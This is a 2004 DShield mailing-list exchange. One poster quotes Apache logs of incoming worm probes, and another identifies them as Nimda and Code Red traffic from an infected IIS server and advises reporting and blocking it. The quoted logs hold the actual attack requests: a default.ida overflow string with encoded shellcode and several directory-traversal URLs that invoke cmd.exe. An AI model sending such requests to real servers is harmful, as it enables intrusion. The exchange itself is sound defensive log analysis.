[Dshield] Look at this Nitwit

Keith Bergen keith at keithbergen.com
Wed Jan 28 21:50:23 GMT 2004


Yes. That is a Windows IIS server that is infected with the 
Nimda virus and trying to propagate it to your box. There's 
probably not a lot you can do about it apart from sending an 
email to his provider with the logs. You may be able to block 
these requests at your firewall. As you are most likely 
aware, your Apache web server is not vulnerable to this 
attack.

I actually log these (and code red) attacks on my Apache 
server.

http://keithbergen.dyndns.org/cgi-bin/ac.pl

Hope this helps,
Keith.

---- Original message ----
>Date: Wed, 28 Jan 2004 15:42:43 -0500
>From: David Hart <DavidHart at TQMcube.com>  
>Subject: [Dshield] Look at this Nitwit  
>To: General DShield Discussion List <list at dshield.org>
>
>Apache log:
>
>pcp03063113pcs.newlaf01.mi.comcast.net - - 
[28/Jan/2004:07:51:32 -0500]
>"GET
>/default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 404 987 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:26 -0500]
>"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:27 -0500]
>"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:27 -0500]
>"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-
" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:28 -0500]
>"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-
" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:28 -0500]
>"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:28 -0500]
>"GET
>/_vti_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:28 -0500]
>"GET
>/_mem_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:29 -0500]
>"GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%
c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-
"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 400
>906 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 400 906
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:31 -0500]
>"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404
>973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - 
[28/Jan/2004:10:49:31 -0500]
>"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 973
>"-" "-"
>
>                               ---------
>            Quality Management - A Commitment to Excellence
>________________
>signature.asc 1k bytes
>________________
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: 
http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list